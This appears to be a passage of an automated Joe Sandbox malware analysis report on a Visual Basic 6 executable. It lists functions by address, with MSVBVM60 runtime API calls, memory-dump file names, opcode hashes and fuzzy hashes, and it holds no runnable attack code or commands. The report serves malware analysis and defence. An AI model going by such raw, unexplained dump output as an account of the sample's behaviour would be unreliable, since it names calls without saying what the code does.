                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00415DD0
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415DE1
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415DEB
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415DFA
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?), ref: 00415E2D
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000006,?,00000000), ref: 00415E43
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000010,?,00000000), ref: 00415E59
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415E70
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00415E86
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?), ref: 00415E97
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EB4
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415EC3
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000), ref: 00415EE4
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 00415EEA
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 00415EF9
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00415F0E
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415F19
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415F23
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00415F32
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415F98
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415FAB
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415FCA
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?), ref: 00415FD4
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF1
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00415FF9
                                                                                                                                                                                  • __vbaUbound.MSVBVM60(00000001,?,?,00000000), ref: 0041600D
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,3F800000,00000000), ref: 00416026
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 00416032
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?), ref: 0041603C
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041605C
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041606D
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?,?,?,3F800004,?), ref: 00416095
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 004160A5
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 004160AE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?), ref: 004160D0
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 004160D9
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00416126), ref: 00416103
                                                                                                                                                                                  • __vbaRecDestruct.MSVBVM60(00406C9C,?), ref: 0041610E
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041611A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00416123
                                                                                                                                                                                    • Part of subcall function 00416140: __vbaSetSystemError.MSVBVM60(00000000,?,00000006,?,00000000,?,00415E12,?), ref: 00416174
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$System$BoundsGenerate$Free$LockUnlock$AnsiCopyDestructExitProcUnicode$RedimUbound
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2812220623-0
                                                                                                                                                                                  • Opcode ID: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                                                  • Instruction ID: e990e7f7e1d036554655f0c5b60a984b82b92affe55a7b322dae047d0808a029
                                                                                                                                                                                  • Opcode Fuzzy Hash: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 40D11B71D00208ABCB04DFE5DD84DEEBBB9FF88700F14851AF506AB254DB75A986CB64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004128B0 Relevance: 61.7, APIs: 41, Instructions: 214COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 004128CE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 004128FB
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041290A
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00412929
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00412938
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 0041294C
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041295A
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041296A
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00412971
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041297E
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004129B3
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004129BE
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004129CE
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004129DB
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 004129F9
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00412A27
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 00412A2E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00412A39
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00412A49
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00412A54
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00412A64
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00412A71
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00412A8C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00412AAA
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000003), ref: 00412ABB
                                                                                                                                                                                  • #616.MSVBVM60(00000000), ref: 00412AC2
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00412ACD
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00412AE2
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000), ref: 00412AE9
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00412B10
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 00412B36
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000004), ref: 00412B57
                                                                                                                                                                                  • #618.MSVBVM60(00000000), ref: 00412B5E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00412B69
                                                                                                                                                                                  • __vbaI4Str.MSVBVM60(00000000), ref: 00412B70
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412B87
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412B9A
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00412BA1
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00412BEA), ref: 00412BDA
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412BE3
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00412C00
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$FreeMove$BstrFile$#516#631Copy$ErrorGet3ListSeek$#525#537#570#616#618#648ChkstkCloseOpenOverflow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 277344030-0
                                                                                                                                                                                  • Opcode ID: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
                                                                                                                                                                                  • Instruction ID: f355006ae09e1e352358bc31eb7e3acedda410367e126062bc5f553c60d2b707
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
                                                                                                                                                                                  • Instruction Fuzzy Hash: D891C8B1D00208EFDB04DFE4DE58BDEBBB4BB48305F208169E612B76A0DB745A45CB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040EAB0 Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 255COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0040EB1A
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                                                  • #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                                                  • #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                                                  • #593.MSVBVM60(00000002,?,?,?,?,0000000A), ref: 0040EC76
                                                                                                                                                                                  • #714.MSVBVM60(?,00000004,00000000,?,?,?,0000000A), ref: 0040ED04
                                                                                                                                                                                  • __vbaVarAdd.MSVBVM60(?,?,00000003,?,?,0000000A), ref: 0040ED1C
                                                                                                                                                                                  • __vbaI4Var.MSVBVM60(00000000,?,?,0000000A), ref: 0040ED23
                                                                                                                                                                                  • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000004,?,?,?,?,0000000A), ref: 0040ED40
                                                                                                                                                                                  • #537.MSVBVM60(?,?), ref: 0040ED54
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED65
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,?), ref: 0040ED68
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?), ref: 0040ED73
                                                                                                                                                                                  • #537.MSVBVM60(?,00000000,?,?), ref: 0040ED77
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED82
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040ED8B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED92
                                                                                                                                                                                  • #537.MSVBVM60(00000000,00000000,?,00000000,?,?), ref: 0040ED96
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDA1
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040EDA4
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDAB
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,?,?), ref: 0040EDC3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040EDEC
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040EE4E), ref: 0040EE47
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(?,?,0000000A), ref: 0040EE69
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$#537$List$#516#593#594#631#714BstrCopyErrorOverflow
                                                                                                                                                                                  • String ID: gfff$gfff
                                                                                                                                                                                  • API String ID: 2397813863-3084402119
                                                                                                                                                                                  • Opcode ID: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
                                                                                                                                                                                  • Instruction ID: 69a6bd49322be43a13479f126592eb8a048afae0e7896bfb7d302a94b416162a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
                                                                                                                                                                                  • Instruction Fuzzy Hash: CD9141B5E00208DBCB08DFB5DD89ADDBBBAEB88341F14453AE505F72A0DB345985CB94
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00410780 Relevance: 52.7, APIs: 35, Instructions: 227COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004093D0,00000000), ref: 0041079E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004107CE
                                                                                                                                                                                  • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004107DF
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004107EE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041080A
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410844
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041085A
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410873
                                                                                                                                                                                  • #525.MSVBVM60(00000104), ref: 0041089C
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004108A7
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004108DE
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041091D
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410938
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041095E
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041096F
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410984
                                                                                                                                                                                  • #616.MSVBVM60(?,?,?,00000000), ref: 00410999
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109A7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004109BE
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004109CA
                                                                                                                                                                                  • #517.MSVBVM60(?,?,00000000), ref: 004109DB
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109E9
                                                                                                                                                                                  • #517.MSVBVM60(?,00000000,?,00000000), ref: 004109F7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00410A05
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 00410A0C
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410A30
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410A77
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00410A8D
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410AA6
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 00410ACA
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00410B37), ref: 00410B03
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00410B1B
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00410B24
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00410B30
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$FreeSystem$AnsiMove$#517$#525#616BoundsChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3648932012-0
                                                                                                                                                                                  • Opcode ID: 87815be6b7c03a5207e36eb47b7e00b3ec7173c49da51aca528be144e1a0b0d3
                                                                                                                                                                                  • Instruction ID: cf7582b6c84a3ebcd0dc45819e7631e4fb138bd8fd28df0a43539233d5c0ba2c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 87815be6b7c03a5207e36eb47b7e00b3ec7173c49da51aca528be144e1a0b0d3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FA109B5901219DFDB14DFA0DD48BDEBBB4BF48304F1081AAE50AB72A0DB745A85CF58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040C700 Relevance: 48.5, APIs: 32, Instructions: 452COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040C71E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040C74E
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C7A1
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040563C,0000001C), ref: 0040C7E9
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0040C80D
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040C81A
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckHresult$Free$ChkstkError
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1728155253-0
                                                                                                                                                                                  • Opcode ID: 57bc03b52b3c873fae243cd4aa70e656bc598bd1710269bbbe43208556864782
                                                                                                                                                                                  • Instruction ID: 528750ef8f6217dc53c7ee79ba9f07e518e2306c00ab0ecc930209c3b3704f0e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 57bc03b52b3c873fae243cd4aa70e656bc598bd1710269bbbe43208556864782
                                                                                                                                                                                  • Instruction Fuzzy Hash: BA1229B5900208EFDB14DFA4C988BDEBBB5FF48700F208269E509B7291D7759985CF64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040EE70 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 230COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                  • #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                  • #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                  • #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                  • #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                  • #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                  • #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                  • #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
